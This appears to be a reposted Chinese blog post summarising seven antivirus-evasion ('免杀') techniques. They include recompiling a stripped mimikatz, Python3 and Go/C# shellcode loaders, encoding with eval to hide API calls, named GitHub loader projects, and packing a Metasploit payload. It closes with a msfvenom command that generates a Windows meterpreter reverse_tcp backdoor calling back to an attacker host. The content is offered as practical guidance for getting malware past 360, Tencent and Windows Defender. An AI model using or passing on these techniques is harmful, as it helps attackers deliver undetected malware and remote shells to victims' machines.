admin管理员组文章数量:1595885
virscan/scan/
方法 1 静态文件特征修改
静态文件
源码去除些特殊关键字和特征字段
如 minikatz https://github/gentilkiwi/minikatz
替换掉图标 minikatz 和项目注释信息等,重新编译 2020-10 月当时最新得的 360 腾讯等免杀.
方法 2 msfloder
MSF 用加载器过 2020-10 当时最新 360 不过这个项目有点老 2012 年的
方法 3 python3 shellcode
python2 的已经很多会被查杀
python3 pyintaller 4.0 以上 shellcode
def shellCodeLoad(shellcode):
pyinstaller -F python3.py --noconsole -i 3.ico -n 生成文件名.exe
有时很多杀毒软件会查杀 ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
可以使用编码进行处理再 eval 动态执行代码
方法 4 golang 加载器
项目 1 github/jax777/shellcode-launch
cobalt strike payload 选 C 语言
项目 2 github/vyrus001/shellGo
方法 5 C# xor 加载器
github/antman1p/ShellCodeRunner
方法 6 第三方工具
如掩日.exe 可以过主流杀毒及 WindowsDefender
方法 7 msf 加壳 202010最新360等免杀
#安装依赖
sudo apt install mingw-64-tools mingw-w64-common g+±mingw-64 gcc-mingw-64 upx-ucl osslsigncode
#MSF 生成后门
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= xx.xxx LPORT=4444 -f exe -o exploit.exe
版权声明:本文标题:免杀方法简单汇总 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dongtai/1728242464a1150720.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论